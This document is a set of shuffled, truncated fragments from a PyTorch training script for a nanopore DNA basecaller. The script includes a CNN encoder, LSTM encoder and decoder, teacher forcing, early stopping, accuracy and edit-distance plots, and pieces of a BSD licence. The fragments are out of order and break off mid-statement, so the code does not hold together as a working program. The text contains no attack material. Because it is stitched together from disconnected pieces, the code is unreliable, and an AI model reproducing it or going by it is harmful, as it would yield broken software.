"your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset",
"#0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias =",
"= np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val",
"reproduce the above copyright notice, this list of conditions and the following disclaimer",
"cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is",
"+= ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if",
"f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has",
"model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0",
"the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\")",
"Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int,",
"sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val =",
"\"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for idx, length in",
"outputs, hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self,",
"val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\",",
"in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax =",
"Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index =",
"# (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going to use",
"for name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1:",
"print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \",",
"seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll,",
"teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses =",
"plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax",
"name and \"lstm\" in name and \"linear\" not in name: for b in",
"in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\",",
"batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random()",
"of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early",
"length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx",
"# [batch size] is typically chosen between 1 and a few hundreds, e.g.",
"#dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates]",
"updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration",
"train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def",
"= val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs",
"# batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label =",
"default=1000, help=\"Make every n updates evaluation on the validation set\") # CNN arguments",
"binary forms, with or without modification, are permitted provided that the following conditions",
"top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\")",
"plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))),",
"5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script",
"= encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] # batch, features,",
"OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS",
"batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your",
"model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12,",
"torchvision import pickle import random import time import matplotlib.pyplot as plt import matplotlib.ticker",
"token = 1 [batch size, SOS token] for i in max_for: # Stop",
"]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y,",
"= Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name,",
"bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size =",
"forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer #",
"= svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train,",
"plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4]",
"= nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class,",
"value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher,",
"output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout =",
"hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation unpacked,",
"{} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {}",
"Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) #",
"Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val =",
"cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(),",
"SummaryWriter import itertools import seaborn as sns import pandas as pd import argparse",
"early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch]",
"# [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim)",
"torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\", 1: \"C\", 2:",
"label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs.",
"through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] # shape of",
"have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio",
"def __init__(self, start, end): self.start = start self.end = end def __eq__(self, other):",
"editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"in p and \"lstm\" in p and \"linear\" not in p: n =",
"np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\",",
"hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes,",
"bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False,",
"if teacher_force else onehot # [batch size, out dim] return outputs, hidden #",
"#256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on =",
"Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4,",
"type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient",
"plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if",
"n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES",
"= (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size,",
"tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10,",
"self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File",
"{0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" +",
"= args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop =",
"v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\")",
"vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100",
"= args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic",
"%\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr']))",
"seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def",
"we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else:",
"= svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]])",
"editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that they match with",
"dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2",
"POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as np import os",
"batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len,",
"len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in",
"batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate",
"of encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and",
"updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit",
"ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val",
"shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01,",
"torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(),",
"input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax",
"2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0)",
"np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax",
"= n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output",
"edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0,",
"* 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path",
"# shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b),",
"0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" *",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1,",
"OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import pandas",
"dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder,",
"+ n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end",
"def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0):",
"= input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use actual next",
"self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len =",
"OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN",
"# batch-i, features, seq len y = y[not_padded_batches, :, :] # batch-i, features,",
"# Network # ----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder",
"[dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder,",
"sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed = 0 #",
"default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # -----------",
"c) + (ingate * cellgate) hy = outgate * F.tanh(cy) return hy, (hy,",
"= {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 =",
"seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden:",
"0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size, output dim] top1",
"= range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size,",
"default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience',",
"dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder",
"= torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2)",
"criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience =",
"= self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size",
"bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took:",
"OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,",
"h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h,",
"self.start = start self.end = end def __eq__(self, other): return self.start <= other",
":] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels",
"test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False,",
"stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early",
"hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :, i] #",
"beam_width=1): # Forward pass through LSTM layer # shape of lstm_in: [batch, input_dim]",
"val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1]",
"4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for idx, length",
"labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x",
"going to use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio #",
"label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label,",
"size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay,",
"we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port))",
"lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be",
"CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number",
"all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size)",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12,",
"scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping",
"np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation',",
"== n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >=",
"const=True, default=False) return parser # Network # ----------- # * CNN-Encoder # *",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()),",
"Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param",
"reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref =",
"(seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn >",
"\"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate start,",
"sns import pandas as pd import argparse from distutils.util import strtobool from polyleven",
"np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name",
"targets oder batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False)",
"hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size,",
"0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0",
"epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping",
"remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] #",
"editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\")",
"= (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output",
"one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that are",
"\".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx,",
"f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={},",
"len(true_y_len) > 1: not_padded_batches = i < true_y_len # get indices of not",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\",",
"len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs.",
"\"linear\" not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name +",
"A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out =",
"help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int,",
"num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len,",
"args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention",
"batch_first=True) # targets oder batch sortieren # unsort the output _, original_idx =",
"= input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 *",
"reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates,",
"reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01",
"= torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate",
"parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type",
"x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1),",
"= teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses",
"set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int,",
"self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2,",
"parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set",
"if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll =",
"hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer #",
"# Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder,",
"0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in",
"and b both have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence",
"hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs",
"target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val",
"bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes,",
"# get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest",
"default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set =",
"dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm =",
"hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1)",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length,",
"earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss =",
"self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h =",
"0): # or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) *",
"batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1):",
"read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len",
"= {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"}",
"input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True,",
"def init_hidden(self): # This is what we'll initialise our hidden state as return",
"the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED",
"In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x,",
"running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc",
"sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars +=",
"LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p =",
"[v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy",
"if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd],",
